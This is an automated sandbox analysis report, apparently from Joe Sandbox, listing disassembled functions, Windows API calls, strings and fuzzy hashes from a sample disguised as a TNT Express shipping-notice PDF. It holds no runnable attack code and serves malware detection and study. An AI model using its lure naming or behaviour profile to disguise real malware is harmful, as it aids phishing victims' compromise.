Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 8f8fff02f53114f270c15116f21453684f5d951199bf6be2a9c1754818697d3d
Instruction ID: d55c71d7de969038476c22c3a194c6a4a832e212312c4255b5920de2f8ff8419
Opcode Fuzzy Hash: 8f8fff02f53114f270c15116f21453684f5d951199bf6be2a9c1754818697d3d
Instruction Fuzzy Hash: 55417CB1A04214EFDB15DF94D884B9ABBA9EF84310F1480ADFD05AF20ED7B0D944CBA0

Function 00921DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

Part of subcall function 00923CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00923CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00921E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00921E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 00921EA9

Part of subcall function 008C6B57: _wcslen.LIBCMT ref: 008C6B6A

Strings

ComboBox, xrefs: 00921DF0
ListBox, xrefs: 00921E25

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: cec8d2432fa650a25b0aa61e63bc6c148dec76742f6cabab370a897dfd3d043a
Instruction ID: cfe95ead056489afb0bc46203011c72cf702a85ab2ce3711d1debe99c615307a
Opcode Fuzzy Hash: cec8d2432fa650a25b0aa61e63bc6c148dec76742f6cabab370a897dfd3d043a
Instruction Fuzzy Hash: 732147B1A00204BEDB14AB68EC49DFFB7BCEF51360B114529F825E72E1DB384E199720

Function 00952F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00952F8D
LoadLibraryW.KERNEL32(?), ref: 00952F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00952FA9
DestroyWindow.USER32(?), ref: 00952FB1

Strings

SysAnimate32, xrefs: 00952F68

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 97e428adb04ed8bcc9cb9c9367c84ba9f9da4f533fd19f7f3ad96210186fd247
Instruction ID: 1b71c08243ae53f2f7ddbbe81ccd3444fa1197820a1c87e60fb8ce0c3088999b
Opcode Fuzzy Hash: 97e428adb04ed8bcc9cb9c9367c84ba9f9da4f533fd19f7f3ad96210186fd247
Instruction Fuzzy Hash: B021C071204205AFEB108F66EC80FBB77BDEB5A366F100618FD50E6190D771DC55AB60

Function 008E4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,008E4D1E,008F28E9,?,008E4CBE,008F28E9,009888B8,0000000C,008E4E15,008F28E9,00000002), ref: 008E4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008E4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,008E4D1E,008F28E9,?,008E4CBE,008F28E9,009888B8,0000000C,008E4E15,008F28E9,00000002,00000000), ref: 008E4DC3

Strings

CorExitProcess, xrefs: 008E4D98
mscoree.dll, xrefs: 008E4D86

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2d1eb540ebd76f36c4246c0330c2cc9c51a42feaf80c18e73192072a67746715
Instruction ID: 331c555f62253cea95a31f41487b8cd1bf1ebfb6583aa823a6255638739dfa9c
Opcode Fuzzy Hash: 2d1eb540ebd76f36c4246c0330c2cc9c51a42feaf80c18e73192072a67746715
Instruction Fuzzy Hash: 8AF04F74A54318BFDB119F96DC49BAEBBB5EF45752F0000A4F909E2260CB705D40EB91

Function 008C4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,008C4EDD,?,00991418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008C4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008C4EAE
FreeLibrary.KERNEL32(00000000,?,?,008C4EDD,?,00991418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008C4EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 008C4EA8
kernel32.dll, xrefs: 008C4E94

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 97bb33a9e21cfe370cacff3895dea0ee7e29b3fba78c4d9ab687e201f01b02fc
Instruction ID: 785593daa6ce6d3a8415bbfe47ea99e9ed4e8f500aae11c92aedfc6e57d9887c
Opcode Fuzzy Hash: 97bb33a9e21cfe370cacff3895dea0ee7e29b3fba78c4d9ab687e201f01b02fc
Instruction Fuzzy Hash: 2DE08675A19B225F932117266C28F5B6664FFC1F737060119FC04E2200DB74CD4592A0

Function 008C4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00903CDE,?,00991418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008C4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008C4E74
FreeLibrary.KERNEL32(00000000,?,?,00903CDE,?,00991418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008C4E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 008C4E6E
kernel32.dll, xrefs: 008C4E5B

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 954aaa5dbc1d5679d30f3e97265aa5c8a231977837c4bb11644baabba89e0a75
Instruction ID: dd9429b6c304f5f1c88559b43d348d25ca794b22337d029d4989229f6e0cb780
Opcode Fuzzy Hash: 954aaa5dbc1d5679d30f3e97265aa5c8a231977837c4bb11644baabba89e0a75
Instruction Fuzzy Hash: 44D0C23151AB215B46221B2ABC28E8B2A28FF81F263460118BC04E2110CF30CD41D3D0

Function 0094A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0094A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0094A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0094A468
CloseHandle.KERNEL32(?), ref: 0094A63D

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 0a6c13a051390d8f171e4d74f42903669b76fc681b3305b600cda3e162559adb
Instruction ID: f8b93627aa5e3d9f2ecc7e25bc5088c33c48ea927809b63a1adb7ccf0ea17c11
Opcode Fuzzy Hash: 0a6c13a051390d8f171e4d74f42903669b76fc681b3305b600cda3e162559adb
Instruction Fuzzy Hash: 9DA17C71644300AFD720DF28D886F2AB7E5EB84714F14895DF59ADB392DBB0EC418B92

Function 008FBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00963700), ref: 008FBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0099121C,000000FF,00000000,0000003F,00000000,?,?), ref: 008FBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00991270,000000FF,?,0000003F,00000000,?), ref: 008FBC36
_free.LIBCMT ref: 008FBB7F

Part of subcall function 008F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008FD7D1,00000000,00000000,00000000,00000000,?,008FD7F8,00000000,00000007,00000000,?,008FDBF5,00000000), ref: 008F29DE
Part of subcall function 008F29C8: GetLastError.KERNEL32(00000000,?,008FD7D1,00000000,00000000,00000000,00000000,?,008FD7F8,00000000,00000007,00000000,?,008FDBF5,00000000,00000000), ref: 008F29F0

_free.LIBCMT ref: 008FBD4B

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: bb5e3fd877f4306c84ac7a176b1693f1d1dde5ffd28178f7df8795d53d2a5526
Instruction ID: f8292c6f44bd2393a7492fd9b6415ef2a7aa7fe0cd20e5a24d6f0733b7fe22b4
Opcode Fuzzy Hash: bb5e3fd877f4306c84ac7a176b1693f1d1dde5ffd28178f7df8795d53d2a5526
Instruction Fuzzy Hash: EB51C57190420DEFCB14EF79DC819BEB7B8FF41360B10426AE664D72A1EB709E419B91

Function 0092E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0092DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0092CF22,?), ref: 0092DDFD

Part of subcall function 0092DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0092CF22,?), ref: 0092DE16

Part of subcall function 0092E199: GetFileAttributesW.KERNEL32(?,0092CF95), ref: 0092E19A

lstrcmpiW.KERNEL32(?,?), ref: 0092E473
MoveFileW.KERNEL32(?,?), ref: 0092E4AC
_wcslen.LIBCMT ref: 0092E5EB
_wcslen.LIBCMT ref: 0092E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0092E650

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 2f7a0baf3b02d23c599413641db204a1a6c999f26309b84f6c8e5baedfc928dd
Instruction ID: f127f46d45dd93365bbfefbbdc23615d4fcfefd64a6cd51f98e7828ba01d9350
Opcode Fuzzy Hash: 2f7a0baf3b02d23c599413641db204a1a6c999f26309b84f6c8e5baedfc928dd
Instruction Fuzzy Hash: 9D5161B24083955BC724EB94E885EDF73ECEF85340F00492EF689D3195EF74A6888766

Function 0094B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

Part of subcall function 0094C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0094B6AE,?,?), ref: 0094C9B5
Part of subcall function 0094C998: _wcslen.LIBCMT ref: 0094C9F1
Part of subcall function 0094C998: _wcslen.LIBCMT ref: 0094CA68
Part of subcall function 0094C998: _wcslen.LIBCMT ref: 0094CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0094BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0094BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0094BB63
RegCloseKey.ADVAPI32(?,?), ref: 0094BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0094BBB3

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 56cf6b874051f8b10077b039f5a03095b5766702bead1d3de445a62966aa705b
Instruction ID: ba17e12f9a68cb897931d80fc7ec013f37e29b5a69b621d145a8980a81480935
Opcode Fuzzy Hash: 56cf6b874051f8b10077b039f5a03095b5766702bead1d3de445a62966aa705b
Instruction Fuzzy Hash: C5615071208241AFD714DF24C495E2ABBF9FF84308F54899DF4998B292DB31ED45CB92

Function 00928BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00928BCD
VariantClear.OLEAUT32 ref: 00928C3E
VariantClear.OLEAUT32 ref: 00928C9D
VariantClear.OLEAUT32(?), ref: 00928D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00928D3B

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: a2d4529006f60a6a3dbb06b910a3cae51e0740b47ada83f2109258852b018273
Instruction ID: 5d45aa1d9b1e10709988e2f08b4e6a5f99215c50fecbe3952156cfd2a9cab99e
Opcode Fuzzy Hash: a2d4529006f60a6a3dbb06b910a3cae51e0740b47ada83f2109258852b018273
Instruction Fuzzy Hash: 1F5178B1A11219EFDB10CF68D884AAAB7F9FF89310B118559E909DB354E730E911CFA0

Function 00938AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00938BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00938BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00938C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00938C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00938C5F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: e834e0900fea37874ea33781bf6001a0357f4b261e390995cfd522e59258d9aa
Instruction ID: da3fdb38a53ad7f66eb2ad537f464679d9329915c5a632b0e05af32f0d19ffd6
Opcode Fuzzy Hash: e834e0900fea37874ea33781bf6001a0357f4b261e390995cfd522e59258d9aa
Instruction Fuzzy Hash: 81514835A002159FCB00DF69C881E6ABBF5FF48314F088459E849AB362CB31ED51DF91

Function 00948EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00948F40
GetProcAddress.KERNEL32(00000000,?), ref: 00948FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00948FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00949032
FreeLibrary.KERNEL32(00000000), ref: 00949052

Part of subcall function 008DF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00931043,?,75C0E610), ref: 008DF6E6
Part of subcall function 008DF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0091FA64,00000000,00000000,?,?,00931043,?,75C0E610,?,0091FA64), ref: 008DF70D

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 9d3363e28554da0997dd5636fa5d3fce22fb8c5b59c9ed28aae12a0d0529db9e
Instruction ID: 84bb0b68c2c9af5cfbfbd4da5dccbc18876062776d95411100992e300be9bcb2
Opcode Fuzzy Hash: 9d3363e28554da0997dd5636fa5d3fce22fb8c5b59c9ed28aae12a0d0529db9e
Instruction Fuzzy Hash: 12514935604205DFCB11DF68C484DAEBBF5FF49324B0480A9E80A9B762DB31ED86CB91

Function 00956B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00956C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00956C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00956C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0093AB79,00000000,00000000), ref: 00956C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00956CC7

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 73ce1d043e36018b3810163cfe8a041cc42a9a57ea51a27ebd1cf05b30ad4b37
Instruction ID: cd06f4e81d481c64e05b2210308562cd6fc2b277b2a74c98f741759e9bfaf45d
Opcode Fuzzy Hash: 73ce1d043e36018b3810163cfe8a041cc42a9a57ea51a27ebd1cf05b30ad4b37
Instruction Fuzzy Hash: D4410835A08204AFD724CF2ACC55FA97BA8EB09361F940228FED5A72E0C371ED45DB40

Function 008F2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008F20C3
_free.LIBCMT ref: 008F20E3

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: d4299aecfd68bdeb1e7584286f605dd614448a7a413e635963fe8303676a62f1
Instruction ID: b48d185bfa14ece7d872c8ee40c2cf7fb9a6561504cef7387e673a80650750ba
Opcode Fuzzy Hash: d4299aecfd68bdeb1e7584286f605dd614448a7a413e635963fe8303676a62f1
Instruction Fuzzy Hash: C441D172A002089FCB24DF78C881A6DB7A5FF89314F1545A9E615EB392DA31AD01DB91

Function 008D912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 008D9141
ScreenToClient.USER32(00000000,?), ref: 008D915E
GetAsyncKeyState.USER32(00000001), ref: 008D9183
GetAsyncKeyState.USER32(00000002), ref: 008D919D

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 9452f7a943e4a2a2fff9b19e45b1109acf6083e0ef01694ee14e9049ae24aafd
Instruction ID: 23464dbce720b13de89a8c6aefade2900baccb5d7b2c05b6ba1916e0aad05ba6
Opcode Fuzzy Hash: 9452f7a943e4a2a2fff9b19e45b1109acf6083e0ef01694ee14e9049ae24aafd
